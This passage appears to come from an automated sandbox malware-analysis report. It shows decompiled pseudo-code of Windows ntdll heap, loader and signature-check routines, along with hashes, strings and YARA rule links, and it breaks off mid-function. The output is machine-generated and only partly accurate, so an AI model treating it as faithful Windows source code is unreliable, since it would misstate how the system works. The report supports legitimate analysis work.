Opcode ID: 6319d8deff24047740f04490de7d8ace5bf7e03f80c3e31ac101a25286aae209
Instruction ID: 2aa87de8cca51c08c14807154a708750b63f4d9aafacf51cf6e3a2a9f626e794
Opcode Fuzzy Hash: 6319d8deff24047740f04490de7d8ace5bf7e03f80c3e31ac101a25286aae209
Instruction Fuzzy Hash: 27411832A00B35AFEF3DABDCD84DB7ABAE5BB00258F4A4169E90457151E7706DC08382

Uniqueness

Uniqueness Score: -1.00%

Function 012749A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 01274AD6
HEAP[%wZ]: , xrefs: 01274A3D, 01274AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01274A61
HEAP: , xrefs: 01274A4A, 01274A5D, 01274A5F, 01274AC4

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 686b35c5664f2823323490db4c337547086451fa5772070fcad051b3e3dcd320
Instruction ID: b40cef6ee42c54f2caf55d461a5b563b1aee1085728d282698fa5cf1f25cf673
Opcode Fuzzy Hash: 686b35c5664f2823323490db4c337547086451fa5772070fcad051b3e3dcd320
Instruction Fuzzy Hash: 48316B31120192FFD729FB59C896F6777ECEF04624F184059F615CB281D770A880C768

Uniqueness

Uniqueness Score: -1.00%

Function 011C8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E011C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E011C934A() != 0) {
								_t159 = E0123A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x12a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01235510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x12a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E011C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E011C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E011C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x12a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x12a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E011D2280(_t92, 0x12a86cc);
															_t94 = E01289DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x12a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E011C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x12a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x12a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E011FF380(_t136, 0x1191184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E011D2280(_t108, 0x12a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01289D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E011CFFB0(_t118, _t156, 0x12a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E011F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x011c8799
0x011c879d
0x011c87a1
0x011c87a3
0x011c87a8
0x011c87c3
0x011c87c3
0x011c87c8
0x011c87d1
0x011c87d4
0x011c87d8
0x011c87e5
0x011c87ec
0x01219bfe
0x01219c00
0x01219c02
0x01219c08
0x01219c0d
0x01219c0f
0x01219c14
0x01219c2d
0x01219c32
0x01219c37
0x01219c3a
0x01219c3c
0x01219c42
0x01219c42
0x01219c3c
0x01219c02
0x011c87da
0x011c87df
0x011c87e3
0x00000000
0x00000000
0x011c87e3
0x011c87f2
0x00000000
0x011c87fb
0x011c87fd
0x011c87fe
0x011c880e
0x011c880f
0x011c8810
0x011c8814
0x011c881a
0x011c881c
0x011c881f
0x011c8821
0x011c8822
0x011c8824
0x011c8826
0x011c882c
0x011c882e
0x01219c48
0x01219c48
0x011c8834
0x011c8834
0x011c8837
0x00000000
0x00000000
0x011c8837
0x011c882e
0x011c883d
0x011c8840
0x011c8843
0x011c8846
0x011c8849
0x011c884c
0x011c884e
0x011c8850
0x011c8852
0x011c8854
0x011c8857
0x011c88b4
0x011c88b6
0x011c88b6
0x011c8859
0x011c8859
0x011c8859
0x011c8861
0x011c8866
0x011c886a
0x011c893d
0x011c8941
0x00000000
0x011c8947
0x011c8947
0x011c894a
0x011c894c
0x00000000
0x011c8952
0x011c8955
0x011c895a
0x011c895d
0x011c895d
0x011c895f
0x011c8961
0x011c8961
0x011c8968
0x00000000
0x00000000
0x011c896a
0x011c896b
0x011c896e
0x00000000
0x011c8970
0x011c8970
0x011c8970
0x011c8970
0x011c8972
0x011c8972
0x011c8974
0x00000000
0x011c897a
0x011c897a
0x011c897d
0x00000000
0x011c8983
0x01219c65
0x01219c6d
0x01219c72
0x01219c75
0x01219c75
0x01219c82
0x01219c86
0x01219c87
0x01219c88
0x01219c89
0x01219c8c
0x01219c90
0x01219c95
0x01219c97
0x01219ca0
0x01219ca3
0x01219ca9
0x01219ca9
0x00000000
0x01219ca9
0x01219ca3
0x00000000
0x01219c97
0x011c897d
0x00000000
0x011c8974
0x011c8988
0x011c8992
0x011c8996
0x00000000
0x011c8996
0x011c894c
0x00000000
0x011c8870
0x011c887b
0x011c887d
0x011c887f
0x011c8881
0x011c8884
0x011c8884
0x011c8886
0x011c8889
0x011c888c
0x011c888e
0x011c8891
0x011c8891
0x011c8898
0x00000000
0x00000000
0x011c889a
0x011c889b
0x011c889e
0x00000000
0x00000000
0x011c88a0
0x011c88a8
0x011c88b0
0x011c88b2
0x011c88d3
0x011c88d5
0x00000000
0x011c88d7
0x011c88db
0x011c88dc
0x011c88e0
0x011c88e8
0x011c88ee
0x011c88f0
0x011c88f3
0x011c88fc
0x011c8901
0x011c8906
0x011c890c
0x011c890c
0x011c890f
0x011c8916
0x011c8917
0x011c8918
0x011c8919
0x011c891a
0x011c891f
0x011c8921
0x01219c52
0x01219c55
0x01219c5b
0x01219cac
0x01219cc0
0x01219cc0
0x01219c55
0x011c8927
0x011c8927
0x011c892f
0x011c8933
0x00000000
0x011c88f5
0x011c88f5
0x00000000
0x011c88f7
0x011c88f7
0x011c88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x011c88fa
0x011c88f5
0x011c88f3
0x00000000
0x011c88d5
0x00000000
0x011c88b2
0x011c88c9
0x00000000
0x011c88c9
0x011c887f
0x011c886a
0x011c8857
0x011c8852
0x011c88bf
0x011c88bf
0x011c87aa
0x011c87ad
0x011c87ae
0x011c87b4
0x011c87b5
0x011c87b6
0x011c87b8
0x011c87bd
0x011c87c1
0x011c87f4
0x011c87fa
0x00000000
0x00000000
0x00000000
0x011c87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01219C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01219C18
LdrpDoPostSnapWork, xrefs: 01219C1E

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: cbca00073d1aaa61cbfb7c9dc53f469a113e711134460f2360e80e2f3208c133
Instruction ID: c307be72413eaa87f801020aa716208a6d202db5d68c9313af28ddb959ec78a4
Opcode Fuzzy Hash: cbca00073d1aaa61cbfb7c9dc53f469a113e711134460f2360e80e2f3208c133
Instruction Fuzzy Hash: 1D910271A10206AFEF1CDF59D8C0ABBB7B5FFA4B14B45406DEA05AB640E730E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011C7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E011C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E011CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E011BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x12a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01235510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x12a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E011D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E011D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01237016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E011D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E011D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01237016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E011EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E011BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x011c7e4c
0x011c7e50
0x011c7e55
0x011c7e58
0x011c7e5d
0x011c7e71
0x011c7f33
0x011c7e77
0x011c7e77
0x011c7e79
0x011c7e79
0x011c7e7e
0x011c7f45
0x01219848
0x00000000
0x01219848
0x011c7f4e
0x011c7f53
0x011c7f5a
0x00000000
0x00000000
0x0121985a
0x01219862
0x01219866
0x00000000
0x0121986c
0x00000000
0x0121986c
0x011c7e84
0x011c7e84
0x011c7e8d
0x01219871
0x011c7eb8
0x011c7ec0
0x011c7ec0
0x011c7e9a
0x0121987e
0x00000000
0x00000000
0x01219884
0x0121988b
0x012198a7
0x012198ac
0x012198b1
0x012198b6
0x012198b8
0x012198b8
0x012198b9
0x00000000
0x012198b9
0x011c7ea0
0x011c7ea7
0x00000000
0x00000000
0x011c7eac
0x011c7eb1
0x011c7ec6
0x011c7ed0
0x012198cc
0x011c7ed6
0x011c7ed6
0x011c7ed6
0x011c7ede
0x011c7ee3
0x012198e3
0x012198f0
0x01219902
0x012198f2
0x012198fb
0x012198fb
0x01219907
0x0121991d
0x0121991d
0x01219907
0x012198e3
0x011c7ef0
0x011c7f14
0x011c7f14
0x011c7f1e
0x01219946
0x011c7f24
0x011c7f24
0x011c7f24
0x011c7f2c
0x0121996a
0x01219975
0x01219975
0x0121997e
0x01219993
0x01219993
0x0121997e
0x00000000
0x011c7ef2
0x011c7efc
0x011c7f0a
0x011c7f0e
0x01219933
0x00000000
0x01219933
0x00000000
0x011c7f0e
0x00000000
0x00000000
0x00000000
0x011c7eb1

Strings

LdrpCompleteMapModule, xrefs: 01219898
minkernel\ntdll\ldrmap.c, xrefs: 012198A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01219891

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 7beeb0b9efd41d49cbb6359eb92e5265e9774fbe8bdebebb41a24fc54b956068
Instruction ID: 9c5754f57983f495fe209bdb3951701c3ed88be00bb1fc4832b5e38d565bdbda
Opcode Fuzzy Hash: 7beeb0b9efd41d49cbb6359eb92e5265e9774fbe8bdebebb41a24fc54b956068
Instruction Fuzzy Hash: 09511332600742DBEB29CB6DC894B3A7BE4AF21B18F050599EA519B7D1D7B0ED40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 011BE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E011BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E011BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011F95D0();
						}
						if(_t78 != 0) {
							L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E011FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E011FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E011F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E011FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L011BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E011FBB40(_t83, _t102 + 0x24, _t78);
								if(L011C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E011FBB40(_t84, _t102 + 0x24, _t94);
									if(L011C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x011be620
0x011be628
0x011be62f
0x011be631
0x011be635
0x011be637
0x011be63e
0x01215503
0x01215503
0x011be64c
0x011be64c
0x011be651
0x00000000
0x00000000
0x011be661
0x011be665
0x0121542a
0x011be715
0x011be71a
0x011be71c
0x011be720
0x011be720
0x011be727
0x011be736
0x011be736
0x011be743
0x011be743
0x011be673
0x011be678
0x011be67d
0x011be682
0x011be685
0x011be692
0x011be69b
0x011be6a3
0x011be6ad
0x011be6b1
0x011be6b2
0x011be6bb
0x011be6bf
0x011be6c0
0x011be6c8
0x011be6cc
0x011be6d5
0x011be6d9
0x00000000
0x00000000
0x011be6e5
0x011be6ea
0x011be6f9
0x011be70b
0x011be70f
0x01215439
0x0121545e
0x0121545e
0x00000000
0x0121545e
0x0121543b
0x0121543e
0x01215440
0x01215445
0x01215472
0x01215475
0x0121548d
0x01215493
0x012154a9
0x00000000
0x00000000
0x012154ab
0x012154b4
0x012154bc
0x012154c8
0x012154de
0x012154fb
0x012154e0
0x012154e6
0x012154eb
0x012154eb
0x012154de
0x00000000
0x012154bc
0x01215477
0x0121547a
0x01215480
0x01215483
0x01215486
0x0121548b
0x00000000
0x00000000
0x00000000
0x0121548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01215447
0x01215447
0x01215447
0x01215447
0x0121544e
0x00000000
0x00000000
0x01215450
0x01215452
0x01215455
0x0121545a
0x00000000
0x00000000
0x00000000
0x0121545c
0x0121546a
0x0121546d
0x0121546f
0x00000000
0x0121546f
0x011be70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 011BE68C
InstallLanguageFallback, xrefs: 011BE6DB
@, xrefs: 011BE6C0

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: ef14d83f39922fb6a311a6bd2da0a1217095d79f74fe7726f6e1bff961cc5b15
Instruction ID: 7d71634f606f009e29620eb43bfdbba5bb99abf28ac24813d66454e5917b7143
Opcode Fuzzy Hash: ef14d83f39922fb6a311a6bd2da0a1217095d79f74fe7726f6e1bff961cc5b15
Instruction Fuzzy Hash: 2D51D2725193469BD718DF68C480BABB3E8FF99618F05096EFA85D7240F734D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0127E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0127E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0127BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0127BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0127AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E011F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0127A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0127A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E011F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0127A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0127A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
